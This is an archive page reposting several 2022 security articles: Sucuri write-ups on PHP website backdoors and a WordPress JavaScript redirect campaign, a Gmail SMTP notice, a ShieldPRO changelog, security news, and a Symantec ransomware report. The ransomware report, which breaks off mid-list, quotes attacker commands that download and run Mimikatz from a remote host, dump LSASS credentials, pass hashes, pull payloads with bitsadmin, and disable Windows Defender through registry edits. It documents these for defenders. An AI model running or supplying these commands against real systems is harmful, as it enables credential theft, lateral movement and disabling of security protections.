Linux Archives - Page 40 of 41 - Appunti dalla rete

Examining Emerging Backdoors

Next up in our “This didn’t quite make it into the 2021 Threat Report, but is still really cool” series: New backdoors!

Backdoors are a crucial component of a website infection. They allow the attackers ongoing access to the compromised environment and provide them a “foot in the door” to execute their payload. We see many different types of backdoors with varying functionality.

When our malware research team is provided with a new backdoor they need to write what’s called a “signature” to ensure that we detect and remove it in future security scans. Signatures need names, and over the years we’ve developed something of a taxonomy naming system for all of the different malware that we come across.

In this article we’re going to explore all the different categories of signatures for newly-discovered backdoors throughout the year 2021.

How do Backdoors Work?

HTTP requests to websites typically fall into one of the following categories:

POST – sending data to a website
GET – requesting data from a website
COOKIE – data (such as session data) saved from a website
REQUEST – a conjunction of all/any of the three

We see all sorts of different backdoors while cleaning up compromised websites. Sometimes they use one of these types of requests, or a combination of multiple different types.

We’ve broken all newly generated signatures from 2021 down for further analysis into the following categories:

A graph showing the distribution of new backdoor signatures generated in 2021.

Uploaders

By far the most common type of backdoor found in 2021 was an uploader: That is, a PHP script that allows the attackers to upload any file that they want. These malicious files allow anyone with the correct URL path, parameters and (occasionally) access credentials to upload whichever files they want to the web server. Typically, bad actors use these backdoors to upload a webshell, spam directory, dropper, or other type of file giving them full control over the environment.

To avoid detection, attackers are always tweaking their malware by using new methods of obfuscation or concealing backdoors within legitimate-looking images, core files, plugins, or even themes — this can make malicious file uploaders difficult to detect during a casual site review.

Once an attacker has identified a vulnerable environment that they can get a foothold in, planting the uploader is often the next step. After that they have enough access to upload more complicated access points such as a webshell.

Of course there are legitimate uploader scripts, as many websites require functionality to allow users to upload photos or other content to the website. To mitigate risk, secure uploader scripts contain strict rules on how they are able to behave:

Only certain file types/extensions are allowed (usually image, or document files)
May require authorisation cookies to be set
May place files in a restricted directory with PHP execution disabled
May disable direct access and instead need to be called by the existing CMS structure

Malicious uploaders, on the other hand, have no such restrictions as they are designed to upload malicious files and PHP scripts.

WebShells

Webshells are a classic type of malware that have been used by attackers for many years. They are administrative dashboards that give the attacker full access to the files and often provide a large amount of information about the hosting environment including operating system, PHP settings, web server configurations, file management, and SQL connections.

The classic FilesMan shell continues to be very popular with attackers. In 2021 we generated 20 new signatures related to new filesman variants alone, not including hack tools which grab filesman shells from remote servers.

Interestingly, a lot of malicious web shells provide far superior functionality than a lot of file managers provided by web hosting providers.

Misc RCE

Sometimes remote code execution backdoors are a little more complicated, or just rely on more basic/generic $_REQUEST calls. This is a PHP global array that contains the content of GET, POST and COOKIE inputs. The content of these variables could be anything and the attacker can fill them — e.g. with the payload — which is then processed. Sometimes the entire payload code is stored there and only very simple code snippets are injected into legitimate files. Such a snippet only loads and executes the content of these variables.

Other times, RCE backdoors make use of multiple different functions and request types.

Generic

Not falling into any particular category are our collection of “generic” backdoors. They tend to use a mixture of different functions and methods to maintain backdoor access to the environment. Some are heavily obfuscated and others are mostly in plain text, but what unites them is that they don’t rely on any one technique to backdoor the environment in which they reside.

FILE_GET_CONTENTS

The PHP function file_get_contents fetches a local file or remote file. As far as backdoors are concerned, attackers misuse this function to grab malicious files located on other websites or servers and add it to the victim’s website. This allows them to host the actual malicious content elsewhere, while maintaining all of the same functionality on the victim environment.

Here we have a very simple backdoor using file_get_contents to grab a backdoor from a malicious server. The actual address is obfuscated through use of a URL shortening service:

The footprint of this malware is very small as the payload resides elsewhere, but the functionality is potentially huge.

Remote Code Execution Backdoors

Not to be confused with remote code execution vulnerabilities, these backdoors are crafted to take whatever command is issued to it by the attacker and execute it in the victim’s environment. These PHP backdoors are often more complex than uploaders and allow the attackers more leeway in terms of how they can interact with the victim website.

If a request is sent that matches the parameters of the backdoor it will execute whichever command the attacker instructs so long as it doesn’t get blocked by any security software or firewall running within the environment.

Here’s another example of a quite well hidden RCE backdoor in a Magento environment:

A well-hidden RCE backdoor in a Magento environment

Attackers make heavy use of the eval function which executes the command in the victim environment.

FILE_PUT_CONTENTS

These backdoors utilise the PHP function file_put_contents which will write the instructed content to a file on the victim environment.

Here is an example of such a backdoor lodged in a WordPress configuration file wp-config.php:

This backdoor writes the specified malicious content into the file structure of the victim website given the correct parameters in the attacker’s request, allowing them to infect other files on the server with the content of their choice.

cURL

The curl() function facilitates the transmission of data. It can be used maliciously to download remote code which can be executed or directly displayed. This way, malware authors are able to create a small backdoor that only has this curl functionality implemented while the payload itself can be downloaded from a remote source.

It has many uses, and as such can be misused in many ways by attackers. We have seen it used frequently in credit card skimmers to transmit sensitive details to exfiltration destinations. It can also be used in RCE backdoors:

Since the attackers have crafted a backdoor to (mis)use curl, and they control the parameters under which it will function, in this way they are able to send or receive malicious traffic to and from the website, depending on how the backdoor is designed.

Authentication Bypass

These types of backdoors are most often seen in WordPress environments. They are small PHP scripts which allow the attacker to automatically log in to the administrator panel without needing to provide any password.

As long as they include the database configuration file in the script then they are able to set the necessary cookies for authorization, as seen in this example here:

A backdoor which bypasses normal authentication

The existence of such backdoors presents a case that additional authentication requirements should be employed within website environments. Protecting your admin panel with our firewall’s protected page feature is a great way to do this.

If you’re not a user of our firewall there are a lot of other ways that your admin panel can be protected.

Basic RCE via POST

Backdoors that take input through POST requests are quite common and many of the backdoor types that we’ve seen contain such functionality. Some of them, however, are quite small and rely exclusively on POST requests.

The example below shows one such backdoor, coupled with basic password protection to ensure that the backdoor is not used by anybody that does not have access to the password.

A basic remote code execution backdoor which uses POST

Fake Plugins

Another tactic that we’ve seen attackers use is the use of fake plugins. This is frequently used as a payload to deliver spam and malware, since WordPress will load the components present in the ./wp-content/plugins directory.

We’ve also seen attackers use these plugins as backdoors to maintain access to compromised environments.

A fake plugin in a WordPress environment

Since admin panel compromises are a very common attack vector, the usage of fake/malicious backdoor plugins is quite popular with attackers.

System Shell Backdoors

Attackers have also written malware that interacts with the hosting environment itself and will attempt to run shell commands via PHP scripts in the environment. This is not always possible, depending on the security settings of the environment, but here’s an example of one such backdoor:

If system() is disabled in the environment then these will not work, so the functionality of such backdoors will be limited by the security settings in the host.

COOKIE Based Backdoors

Some malware creators use COOKIES as a storage for various data. These can be decryption keys used to decode an otherwise inaccessible payload, or even the entire malicious payload itself.

CREATE_FUNCTION

The create_function() is often used by malware instead of (or in conjunction with) the eval() function to hide the execution of the malicious code. The payload is encapsulated inside the crafted custom function, often with an obfuscated name to make the functionality less clear.

This function is then called somewhere else within the code, and thus the payload is evaluated. Backdoors have been found to abuse this to place their payload back on the infected website after it was removed.

A backdoor which creates a malicious function in the victim environment

RCE via GET

Backdoors have also been seen using GET requests for input, rather than POST requests. In the example below we can see that the backdoor will execute the malicious payload if a GET request contains a certain string.

A remote code execution backdoor which uses GET

This allows the attackers to restrict the usage of the backdoor to only those who know the exact parameters to specify in the malicious GET request to the website. If the correct parameters are given then the backdoor will execute its intended function.

Database Management Backdoors

Most often attackers will misuse tools such as Adminer to insert malicious content into the victim website’s database, but occasionally we have seen them craft their own database management tools. This allows them to insert admin users into the website as well as inject malicious JavaScript into the website content to redirect users to spam or scam websites or steal credit card information from eCommerce environments.

Conclusion & Mitigation Steps

Backdoors play a crucial role for the attackers in a huge number of website compromises. Once the attackers are able to gain a foothold into an environment their goal is to escalate the level of access they have as much as possible. Certain vulnerabilities will provide them access only to certain directories. For example, a subdirectory of the wp-content/uploads area of the file structure.

Often the first thing they will do is place a malicious uploader or webshell into the environment, giving them full control over the rest of the website files. Once that is established they are able to deliver a payload of their choosing.

If default configurations are in place in a standard WordPress/cPanel/WHM configuration a single compromised admin user on a single website can cause the entire environment to be infected. Attackers can move laterally throughout the environment by the use of symlinks even if the file permissions/ownership are configured correctly.

Malicious actors are writing new code daily to try to evade existing security detections. As security analysts and researchers it’s our job to stay on top of the most recent threats and ensure that our tools and monitoring detect it all.

Throughout the year 2021 we added hundreds of new signatures for newly discovered backdoors. I expect we’ll also be adding hundreds more this year.

If you’d like us to help you monitor and secure your website from backdoors and other threats you can sign up for our platform-agnostic website security services.

Source :
https://blog.sucuri.net/2022/05/examining-emerging-backdoors.html

Massive WordPress JavaScript Injection Campaign Redirects to Ads

Our remediation and research teams regularly find malicious redirects on client sites. These infections automatically redirect site visitors to third-party websites with malicious resources, scam pages, or commercial websites with the intention of generating illegitimate traffic.

As outlined in our latest hacked website report, we’ve been tracking a long-lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the year — for example, according to PublicWWW, the April wave for this campaign was responsible for nearly 6,000 infected websites alone.

Since these PublicWWW results only show detections for simple script injections, we can assume that the scope is significantly larger.

Investigating Obfuscated JavaScript in WordPress Sites

We recently investigated a number of WordPress websites complaining about unwanted redirects. Interestingly enough, they were found to be related to a new wave of this massive campaign and were sending website visitors through a series of website redirects to serve them unwanted ads.

The websites all shared a common issue — malicious JavaScript had been injected within their website’s files and the database, including legitimate core WordPress files such as:

./wp-includes/js/jquery/jquery.min.js
./wp-includes/js/jquery/jquery-migrate.min.js

Once the website had been compromised, attackers had attempted to automatically infect any .js files with jQuery in the names. They injected code that begins with “/* trackmyposs*/eval(String.fromCharCode…”

However, it was clear that the attackers had taken some measures to evade detection and had obfuscated their malicious JavaScript with CharCode, as seen below.

Malicious JavaScript injection obfuscated with CharCode

Once deobfuscated, the true behavior of the injection emerged.

Deobfuscated malicious JavaScript redirects site visitors on page load

This JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the attacker’s destination.

Malicious Chain of Redirects

To accomplish these redirects, the malicious injection creates a new script element with the legendarytable[.]com domain as the source.

The code from the legendarytable[.]com domain then calls to a second external domain — local[.]drakefollow[.]com — which calls from links[.]drakefollow[.]com, redirecting the site visitor to one of many different domains including:

bluestringline[.]com
browntouchmysky[.]com
redstringline[.]com
whitetouchmysky[.]com
gregoryfavorite[.]space
gregoryfavorite[.]top
pushnow[.]net/

At this point, it’s a free for all. Domains at the end of the redirect chain may be used to load advertisements, phishing pages, malware, or even more redirects.

From a site visitor’s perspective, they’ll simply see the following malware page before landing on the final destination.

This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open — and ads will look like they come from the operating system, not from a browser.

These sneaky push notification opt-in maneuvers also happen to be one of the most common ways attackers display “tech support” scams, which inform users that their computer is infected or slow and they should call a toll-free number to fix the problem.

Detecting Malicious JavaScript via SiteCheck

Client-side redirects are initiated by the site visitors’ browser once the infected web page has been loaded. Since this particular infection is found client-side, remote website scanners like SiteCheck can help scan a website and identify this malware.

Here’s an example of a SiteCheck results page for this specific campaign.

SiteCheck results for malicious Javascript injection

At the time of writing, PublicWWW has reported 322 websites impacted by this new wave for the malicious drakefollow[.]com domain. Considering that this count doesn’t include obfuscated malware or sites that have not yet been scanned by PublicWWW, the actual number of impacted websites is likely much higher.

Conclusion & Mitigation Steps

Our team has seen an influx in complaints for this specific wave of the massive campaign targeting WordPress sites beginning May 9th, 2022, which has impacted hundreds of websites already at the time of writing.

It has been found that attackers are targeting multiple vulnerabilities in WordPress plugins and themes to compromise the website and inject their malicious scripts. We expect the hackers will continue registering new domains for this ongoing campaign as soon as existing ones become blacklisted.

If you believe that your website has been infected with malicious JavaScript or you have found unwanted redirects to spam or ads on your site, you can use our free remote website scanner to detect the malware.

Website owners who have identified malware on their website can leverage the instructions found in our hacked WordPress cleanup guide — and, as always, we’re happy to help clean up an infection if you need a hand.

Source :
https://blog.sucuri.net/2022/05/massive-wordpress-javascript-injection-campaign-redirects-to-ads.html

Gmail Is Disabling Less Secure Apps: What To Do Next

Google has announced that it’s disabling the Less Secure Apps feature on some Google accounts from May 30th, 2022.

If you’re using Gmail SMTP details with our Other SMTP mailer, you may have difficulty sending emails when this feature is disabled.

We know that many of our customers rely on Gmail to send emails from WordPress and we wanted to provide some information so that you can avoid deliverability problems.

What Is Less Secure Apps in Gmail?

Less Secure Apps is a feature in Gmail that allows software and devices to sign in to your Gmail account with your main Google username and password.

Allow Less Secure Apps setting in Google account

Up until now, it was possible to send emails through Gmail SMTP with this setting turned on.

Now, Google has decided to begin phasing out Less Secure Apps from May 30th, 2022. Google Workspace and Google Cloud Identity users won’t be affected right away, but support for Less Secure Apps will still be phased out for those users at a later date.

We’ve recommended app passwords for some time, but some customers have chosen to use Less Secure Apps since it’s a little more straightforward. Now that the feature is being retired, all users will need to switch to app passwords or use a different mailer.

How to Switch From Less Secure Apps

If you’re using WP Mail SMTP, here are the options available.

In This Article

Option 1: Switch to the Gmail Mailer

WP Mail SMTP has a dedicated Gmail mailer that connects to the Google API to send emails from WordPress.

Our Gmail mailer is available in both the Lite and Pro versions of our plugin.

It’s also more secure than sending emails through the SMTP protocol.

To use the Gmail mailer, you’ll need to set up a free Google Cloud Console account and generate an API key. You’ll find step-by-step instructions in our doc on how to set up the Google Workspace / Gmail mailer in WP Mail SMTP.

Option 2: Use an App Password

If you’d like to continue using the Other SMTP mailer in WP Mail SMTP, you can set up an app password in your Google account.

An app password works like an alternate password for your account. It can only be used by the applications you share it with, so it’s more secure than sharing your primary password.

If you’d like to use an app password, you’ll need to turn on two factor authentication for your Google account first.

After that, you can create an app specific password for WP Mail SMTP in the security settings for your Google account.

If you’d like to start now, we’ve got step-by-step instructions in our doc on how to set up the Other SMTP mailer in WP Mail SMTP.

Note: any time you change your main Google account password, it will deactivate your app passwords as well. If you change your password frequently, this may not be the best workaround.

Option 3: Switch to a New Mailer

If you’re not set on using Gmail, WP Mail SMTP has a ton of other mailers that use secure, API-based connections to send email from WordPress.

Our recommended mailers are listed at the top of the Setup Wizard.

Here are some more details on our top mailers:

SendLayer: Our #1 recommended mailer and one of the easiest mailers to use with WP Mail SMTP. Once you’ve added DNS records to your domain, all you need is an API key. You can start with a trial and send 500 emails for free, then upgrade to a paid plan from $5/ month (paid annually).
SMTP.com: Free for 30 days, then priced from $25/ month. SMTP.com is an industry leader and has a track record of great email deliverability dating back over 20 years.
Sendinblue: If you’re testing Gmail alternatives, Sendinblue could be a good choice. You can get started without a credit card and upgrade to a plan with more capacity when you’re ready.

To switch your mailer, head to your WP Mail SMTP settings and click the Launch Setup Wizard button.

The Setup Wizard will walk you through the connection steps.

If these mailers aren’t right for you, you can also send through Microsoft 365, SendGrid, Mailgun, Amazon SES, and many more secure, API-based email providers. Here’s a complete guide to all of our mailers to help you decide.

How to Get Help with WP Mail SMTP

We understand that making changes to your mailer can be challenging, but we’re here to help!

If you’re using WP Mail SMTP Lite, you can get assistance on our WordPress.org support forum.

If you’re using any paid version, you can log in to your account and open a ticket. As a valued customer, you’ll get priority support when updating your mailer settings.

Source :
https://wpmailsmtp.com/gmail-less-secure-apps/

ShieldPRO 15.0 Upgrade Guide

ShieldPRO 15.0 for WordPress is a major release.
We’ve taken steps to improve the Shield Security Dashboard navigation menu and the Overview section UI making it much easier to secure your WordPress site by quickly identifying areas of improvement. Also, the original WordPress Admin Dashboard widget was pretty basic, so we’ve completely revamped it with some of your latest site activity. This guide outlines what have been added/removed, changed, or improved and what fixes we’ve made.

Firstly, we’re going to explain what major changes are made and which options you’d need to review.

New Added Features

For 15.0 release we added

Block Username Fishing option

This feature is now a Bot Signal which is recorded in the Activity Log and triggers offenses.

You can use this option to block the ability to discover WordPress usernames based on author IDs. When enabled, any URL requests containing “author=” will be killed.

This option is accessible from within WP Lockdown module > Obscurity:

Security Rules Engine

The new Security Rules Engine is the new foundation of how Shield will handle security for nearly all WordPress requests. It’s accessible from within the main navigation menu > Tools section.

This article outlines what brought this about, what the Rules Engine is and does, and how it will inform future development and our approach to WordPress Security.

Changes

Change 1: All-New Security Overview page

We’ve broken up the plugin into 7 key areas and gathered configuration options and conditions of the site under each one. We give each component a weighted score and calculate an overall percentage.

You can see your score within each area and click “Analysis” to get a clear breakdown of what constitutes that score.

Example, Site Scanning area:

Change 2: All-New Dashboard WidgetSimilar to the Security Overview we offer some visibility to the workings of the Shield plugin right on the WordPress Dashboard, using the built-in widget area.Currently it shows your

security overview progress
recently blocked IPs
recent offending IPs
recent user sessions
jump links to key plugin areas

Change 3: New Template-Based Block Pages

When triggering the Shield defenses, Shield now provides a much more visitor-friendly block page that outlines exactly what’s happened. It’ll provide details of why the block occurred and what the visitor can do about it. Please see below examples of the new blocking pages.

General IP Blocking Page (non-logged in users)

General IP Blocking Page (logged in users)

Firewall Blocking Page

Username Fishing Blocking Page

Change 4: Audit Trail (now renamed to Activity Log) and Traffic Log: Direct access to the IP analysis

In the previous plugin release, when you click an IP address from within Audit Trail or Traffic Log, you were directed to the IP Analysis page in a separate tab.

Now, you can analyse IP directly from within Audit Trail (Activity Log) Traffic Log. Please see below examples.

From Within Audit Trail (Activity Log)

From Within Traffic Log

Change 5: Option Removed: Legacy Comment SPAM Detection

We’ve completely removed the older, less reliable comment spam detection using Javascript and CAPTCHAs. Please use the newer AntiBot Detection Engine. Change 6: Option Removed: Auto-Filter Scan ResultsShield will now filter unnecessary scan results automatically.

This option can now be adjusted using a WP filter. Change 7: Deprecated: Options For CAPTCHA and GASP Bot Checking On WordPress Login FormsThe options to use CAPTCHA and/or GASP Bot Checking for WordPress Login SPAM has been deprecated. These options are replaced with the AntiBot Detection Engine and will be completely removed in a future release.

Change 8: Audit Trail Renamed to Activity Log

Improvements

For 15.0 release we’ve made the following improvements

Improved Plugin Navigation
This release brings further enhancements in this area – the new dynamic page loading and smoother navigation.
Improved Visitor IP Source Detection
We’ve built a Javascript utility which will determine your best visitor IP source. This should, hopefully, solve this problem of everyone going forward, even if your host is badly configured (there are many such hosts!).
Massive Performance Optimisations
As part of our new approach to security with the Security Rules Engine, we’ve taken the opportunity to rip out legacy code and optimise many other areas. We’ve eliminated unnecessary MySQL queries and redesigned core components to be more efficient with how they store data.
New Filters: Adjust scanner notices about plugin/theme update/active status
You can now use filters to adjust whether Shield warns about inactive plugins/themes or those with updates.
A New WP Filter To Add Custom Shield Template Directory
If you’re looking to adjust some of our page templates, such as the block pages, you can now provide custom templates more easily using the new filter.
Option Removed: XML-RPC bypass option, under the General settings:

This option can now be adjusted using a WP filter.

Fixes

For 15.0 release, we’ve made the following fixes

15.0 release
- Broken password reset links in some cases when using hidden login page
- Help ensure forward compatibility for sites with newer TWIG libraries also installed
- Fix for some scan results browsing errors

For more information on Shield 15.0 release, read this blog article here.

Source :
https://help.getshieldsecurity.com/article/461-shieldpro-15-0-upgrade-guide

Cloudflare Thwarts Record DDoS Attack Peaking at 15 Million Requests Per Second

Cloudflare on Wednesday disclosed that it acted to mitigate a 15.3 million request-per-second (RPS) distributed denial-of-service (DDoS) attack. The web infrastructure and website security company called it one of the “largest HTTPS DDoS attacks on record.”

“HTTPS DDoS attacks are more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection,” Cloudflare’s Omer Yoachimik and Julien Desgats said. “Therefore it costs the attacker more to launch the attack, and for the victim to mitigate it.”

The volumetric DDoS attack is said to have lasted less than 15 seconds and targeted an unnamed Cloudflare customer operating a crypto launchpad.

Volumetric DDoS attacks are designed to overwhelm a target network/service with significantly high volumes of malicious traffic, which typically originate from a botnet under a threat actor’s control.

distributed denial-of-service (DDoS) attack

Cloudflare said the latest attack was launched from a botnet consisting of roughly 6,000 unique compromised devices, with 15% of the attack traffic emanating from Indonesia, followed by Russia, Brazil, India, Colombia, and the U.S.

“What’s interesting is that the attack mostly came from data centers,” Yoachimik and Desgats noted. “We’re seeing a big move from residential network Internet Service Providers (ISPs) to cloud compute ISPs.”

Record-setting DDoS attacks have become increasingly common in recent months. In August 2021, Cloudflare disclosed what it characterized as the largest application-layer attack ever seen, and, earlier this year, Microsoft revealed that it had prevented multiple DDoS attacks that crossed 2.4 terabits per second (Tbps).

In addition, cybersecurity firm Kaspersky revealed this week that the number of DDoS attacks hit an all-time high in the first quarter of 2022, jumping 4.5 times year-over-year, largely driven by Russia’s invasion of Ukraine.

“The DDoS attack landscape in Q1 was strongly influenced by the geopolitical situation: since the end of February, we have seen a surge in hacktivist activity and the emergence of a large number of spontaneous botnets that users connected to voluntarily,” the Russian company said.

Source :
https://thehackernews.com/2022/04/cloudflare-thwarts-record-ddos-attack.html

Unpatched DNS Related Vulnerability Affects a Wide Range of IoT Devices

Cybersecurity researchers have disclosed an unpatched security vulnerability that could pose a serious risk to IoT products.

The issue, which was originally reported in September 2021, affects the Domain Name System (DNS) implementation of two popular C libraries called uClibc and uClibc-ng that are used for developing embedded Linux systems.

uClibc is known to be used by major vendors such as Linksys, Netgear, and Axis, as well as Linux distributions like Embedded Gentoo, potentially exposing millions of IoT devices to security threats.

“The flaw is caused by the predictability of transaction IDs included in the DNS requests generated by the library, which may allow attackers to perform DNS poisoning attacks against the target device,” Giannis Tsaraias and Andrea Palanca of Nozomi Networks said in a Monday write-up.

DNS poisoning, also referred to as DNS spoofing, is the technique of corrupting a DNS resolver cache — which provides clients with the IP address associated with a domain name — with the goal of redirecting users to malicious websites.

The vulnerability in uClibc and uClibc-ng is the result of having a predictable transaction ID assigned to each DNS lookup and their static use of source port 53, effectively defeating source port randomization protections.

Successful exploitation of the bug could allow an adversary to carry out Man-in-the-Middle (MitM) attacks and corrupt the DNS cache, effectively rerouting internet traffic to a server under their control.

Nozomi Networks cautioned that the vulnerability could be trivially exploited in a reliable manner should the operating system be configured to use a fixed or predictable source port.

“The attacker could then steal and/or manipulate information transmitted by users, and perform other attacks against those devices to completely compromise them,” the researchers said.

Source :
https://thehackernews.com/2022/05/unpatched-dns-related-vulnerability.html

Critical TLStorm 2.0 Bugs Affect Widely-Used Aruba and Avaya Network Switches

Cybersecurity researchers have detailed as many as five severe security flaws in the implementation of TLS protocol in several models of Aruba and Avaya network switches that could be abused to gain remote access to enterprise networks and steal valuable information.

The findings follow the March disclosure of TLStorm, a set of three critical flaws in APC Smart-UPS devices that could permit an attacker to take over control and, worse, physically damage the appliances.

IoT security firm Armis, which uncovered the shortcomings, noted that the design flaws can be traced back to a common source: a misuse of NanoSSL, a standards-based SSL developer suite from Mocana, a DigiCert subsidiary.

The new set of flaws, dubbed TLStorm 2.0, renders Aruba and Avaya network switches vulnerable to remote code execution vulnerabilities, enabling an adversary to commandeer the devices, move laterally across the network, and exfiltrate sensitive data.

Affected devices include Avaya ERS3500 Series, ERS3600 Series, ERS4900 Series, and ERS5900 Series as well as Aruba 5400R Series, 3810 Series, 2920 Series, 2930F Series, 2930M Series, 2530 Series, and 2540 Series.https://player.vimeo.com/video/704230226?h=6c3f78c718&byline=0&portrait=0

Armis chalked up the flaws to an “edge case,” a failure to adhere to guidelines pertaining to the NanoSSL library that could result in remote code execution. The list of bugs is as follows –

CVE-2022-23676 (CVSS score: 9.1) – Two memory corruption vulnerabilities in the RADIUS client implementation of Aruba switches
CVE-2022-23677 (CVSS score: 9.0) – NanoSSL misuse on multiple interfaces in Aruba switches
CVE-2022-29860 (CVSS score: 9.8) – TLS reassembly heap overflow vulnerability in Avaya switches
CVE-2022-29861 (CVSS score: 9.8) – HTTP header parsing stack overflow vulnerability in Avaya switches
HTTP POST request handling heap overflow vulnerability in a discontinued Avaya product line (no CVE)

Even more concerningly, the vulnerabilities found in Avaya switches are zero-click, meaning they can be activated via unauthenticated network packets without any user interaction.

“These research findings are significant as they highlight that the network infrastructure itself is at risk and exploitable by attackers, meaning that network segmentation alone is no longer sufficient as a security measure,” Barak Hadad, head of research in engineering at Armis, said.

Organizations deploying impacted Avaya and Aruba devices are highly recommended to apply the patches to mitigate any potential exploit attempts.

Source :
https://thehackernews.com/2022/05/critical-tlstorm-20-bugs-affect-widely.html

Ransomware: How Attackers are Breaching Corporate Networks

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.

Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:

Hive
Conti
Avoslocker

Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.

Once initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to help the operators achieve the following:

Gain persistence on the network
Escalate privileges
Tamper with and evade security software
Laterally move across the network

Initial Access

Affiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:

Spear phishing leading to the deployment of malware, including but not limited to:
- IcedID
- Emotet
- QakBot
- TrickBot
Taking advantage of weak RDP credentials
Exploiting vulnerabilities such as:
- Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
- FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
- Apache Log4j vulnerabily – CVE-2021-44228

In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.

Persistence

After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:

netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes

Actors are also known to create additional users on compromised systems to maintain access. In some instances we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUserName /t REG_SZ /d <user> /f

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v AutoAdminLogon /t REG_SZ /d 1 /f

Discovery

During the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:

ADRecon – Gathers Active Directory information and generates a report
Netscan – Discovers devices on the network

Credential Access

Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:

powershell IEX((new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/<redacted>/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds

In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full

Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. In rare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.

Lateral Movement

Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.

PsExec

psexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\xxx.exe

wmic /node:@C:\share$\comps1.txt /user:”user” /password:”password” process call create “cmd.exe /c bitsadmin /transfer xxx \\IP\share$\xxx.exe %APPDATA%\xxx.exe&%APPDATA%\xxx.exe”

BITSAdmin

bitsadmin /transfer debjob /download /priority normal hxxp://<IP>/ele.dll CSIDL_WINDOWS\ele.dll

Mimikatz

mimikatz.exe “privilege::debug” “sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash>”

Defense Evasion

As with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sc commands to disable or terminate them. In some cases they also use tools like PC Hunter to end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.

Both Hive and AvosLocker have been observed attempting to disable Windows Defender using the following reg.exe commands.

AvosLocker:

reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Hive:

reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableIOAVProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableOnAccessProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRealtimeMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableScanOnRealtimeEnable” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Reporting” /v “DisableEnhancedNotifications” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG_DWORD /d “0” /f

